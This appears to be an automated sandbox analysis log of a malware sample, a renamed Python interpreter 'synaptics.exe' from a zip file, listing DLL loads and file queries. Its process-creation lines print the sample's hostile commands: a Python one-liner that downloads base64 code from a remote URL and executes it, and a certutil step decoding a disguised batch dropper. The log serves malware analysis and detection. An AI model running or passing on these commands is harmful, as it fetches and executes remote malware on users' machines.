Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dll
Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\System32\OpenWith.exeSection loaded: atlthunk.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{11659a23-5884-4d1b-9cf6-67d6f4f90b36}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeFile opened: C:\Users\user\Desktop\tmp\pyvenv.cfgJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: tmp.zipStatic file information: File size 17958534 > 1048576
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: synaptics.exe, 0000000C.00000002.1963387255.000000006C804000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdbOO source: synaptics.exe, 0000000C.00000002.1982535254.0000000073C2B000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: D:\a\1\b\bin\win32\pythonw.pdb source: synaptics.exe, 0000000C.00000000.1629744050.0000000000352000.00000002.00000001.01000000.00000004.sdmp, synaptics.exe, 0000000C.00000002.1930501818.0000000000352000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_bz2.pdb source: synaptics.exe, 0000000C.00000002.1983332147.0000000073D3C000.00000002.00000001.01000000.00000011.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_ssl.pdb source: synaptics.exe, 0000000C.00000002.1984639741.0000000073D7C000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: d:\a01\_work\11\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: synaptics.exe, 0000000C.00000002.1985617108.00000000747F1000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: D:\a\1\b\libssl-1_1.pdbAA source: synaptics.exe, 0000000C.00000002.1966699557.000000006C922000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\bin\win32\select.pdb source: synaptics.exe, 0000000C.00000002.1986111830.0000000074AC3000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: D:\a\1\b\bin\win32\pythonw.pdb source: synaptics.exe, 0000000C.00000000.1629744050.0000000000352000.00000002.00000001.01000000.00000004.sdmp, synaptics.exe, 0000000C.00000002.1930501818.0000000000352000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_hashlib.pdb source: synaptics.exe, 0000000C.00000002.1984069156.0000000073D65000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdb source: synaptics.exe, 0000000C.00000002.1982535254.0000000073C2B000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_queue.pdb source: synaptics.exe, 0000000C.00000002.1983655374.0000000073D53000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: synaptics.exe, 0000000C.00000002.1956133927.000000006C67C000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: D:\a\1\b\bin\win32\python310.pdb source: synaptics.exe, 0000000C.00000002.1976070678.000000006CC74000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: D:\a\1\b\bin\win32\_socket.pdb source: synaptics.exe, 0000000C.00000002.1985302258.0000000073DE8000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:35 2023 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not available source: synaptics.exe, 0000000C.00000002.1963387255.000000006C804000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: synaptics.exe, 0000000C.00000002.1966699557.000000006C922000.00000002.00000001.01000000.0000000B.sdmp
Source: C:\Users\user\Desktop\tmp\synaptics.exeCode function: 12_3_021A4418 pushad ; ret 12_3_021A4419
Source: C:\Users\user\Desktop\tmp\synaptics.exeCode function: 12_3_021A2AA0 pushad ; retf 12_3_021A2AA1
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: synaptics.exe, 0000000C.00000003.1710298598.00000000023CA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1724642578.00000000023C9000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1719985129.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1711991015.00000000023CA000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1713919667.00000000023CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: synaptics.exe, 0000000C.00000003.1926402201.00000000023C8000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1918424287.00000000023C2000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 0000000C.00000003.1688014912.00000000023CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld event object handle is invalid.
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\tmp\synaptics.exe "synaptics.exe" -c "import requests,base64; exec(base64.b64decode(requests.get('https://www.aviationchartersolutions.com/form/php-mailer/examples/styles/bin/Tuyen/Tuyen_ALL').text))"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -f -decode "C:\Users\Public\Windows Security.~b64" "C:\Users\Public\Windows Security.bat"Jump to behavior
Source: C:\Windows\System32\OpenWith.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Windows SecurityJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\__init__.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\__init__.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\__init__.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\__init__.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\__init__.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\__pycache__\__init__.cpython-310.pyc.33280136 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\codecs.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\codecs.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\codecs.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\codecs.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\codecs.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__\codecs.cpython-310.pyc.29080800 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\aliases.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\aliases.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\aliases.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\aliases.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\aliases.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\__pycache__\aliases.cpython-310.pyc.33282736 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\utf_8.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\utf_8.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\utf_8.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\utf_8.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\utf_8.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\__pycache__\utf_8.cpython-310.pyc.33281384 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\cp1252.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\cp1252.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\cp1252.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\cp1252.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\cp1252.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\encodings\__pycache__\cp1252.cpython-310.pyc.34834912 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\io.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\io.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\io.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\io.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\io.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__\io.cpython-310.pyc.34865624 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\abc.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\abc.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\abc.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\abc.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\abc.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__\abc.cpython-310.pyc.34865448 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\site.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\site.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\site.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\site.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\site.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__\site.cpython-310.pyc.34872536 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\os.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\os.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\os.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\os.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\os.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__\os.cpython-310.pyc.34869368 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\stat.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\stat.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\stat.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\stat.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\stat.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__\stat.cpython-310.pyc.33398152 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\_collections_abc.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\_collections_abc.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\_collections_abc.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\_collections_abc.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\_collections_abc.py VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\__pycache__\_collections_abc.cpython-310.pyc.36269760 VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\DLLs VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\tmp\synaptics.exeQueries volume information: C:\Users\user\Desktop\tmp\Lib\ntpath.py VolumeInformationJump to behavior
